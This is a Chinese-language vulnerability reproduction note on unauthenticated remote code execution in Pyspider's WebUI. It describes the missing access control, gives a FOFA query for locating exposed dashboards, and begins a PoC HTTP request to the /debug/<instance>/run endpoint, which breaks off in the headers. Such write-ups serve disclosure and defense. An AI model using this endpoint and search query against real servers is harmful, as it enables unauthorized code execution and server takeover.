Pyspider WebUI 未授权访问致远程代码执行漏洞复现
0x01 产品简介
Pyspider是由国人binux编写的强大的网络爬虫系统,它带有强大的WebUI(Web用户界面),为用户提供了可视化的编写、调试和管理爬虫的能力。这一特点使得Pyspider在爬虫框架中脱颖而出,尤其适合那些希望快速上手并高效开发爬虫的用户。允许用户直接在网页上编写和调试爬虫代码,无需使用传统的代码编辑器和命令行工具,极大地提高了开发效率。用户可以通过WebUI界面实时监控爬虫的爬取进度、查看爬取结果,并对爬虫项目进行管理。
0x02 漏洞概述
由于Pyspider WebUI未进行合理的访问控制,默认允许远程攻击者未授权访问webui界面,且系统内部存在python脚本在线编辑并运行的模块,导致未经身份验证的攻击者可远程执行python代码调用系统命令来获取服务器权限。
0x03 复现环境
FOFA:title="Dashboard - pyspider"
0x04 漏洞复现
PoC
POST /debug/任意实例名/run HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,z